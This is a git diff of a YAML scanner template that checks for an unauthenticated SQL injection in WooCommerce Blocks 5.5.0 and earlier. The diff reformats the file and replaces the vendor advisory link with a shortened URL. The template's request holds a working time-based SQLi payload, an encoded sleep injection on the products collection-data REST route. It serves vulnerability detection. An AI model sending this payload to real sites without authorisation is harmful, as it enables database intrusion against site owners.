--- a/vulnerabilities/wordpress/wordpress-woocommerce-blocks.yaml
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-blocks.yaml
@@ -1,16 +1,17 @@
+---
 id: sqli_woocommerce
 
 info:
-  name: SQL Injection in WooCommerce and WooCommerce Blocks <= 5.5.0
+  name: Unauthenticated SQLi in WooCommerce and WooCommerce Blocks <= 5.5.0
   author: cookiehanhoan
   severity: High
-  description: https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/, https://www.facebook.com/cookie.han.hoan
+  description: https://bit.ly/3wHx3w4, https://www.facebook.com/cookie.han.hoan
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=and&calculate_attribute_counts[0][taxonomy]=cookiehanhoan%252522%252529%252520or%252520sleep%2525280%25252e1%252529%252520or%252520%252528%252522"
     matchers:
-          - type: dsl
-            dsl:
-              - "duration>=1"
+      - type: dsl
+        dsl:
+          - "duration>=1"
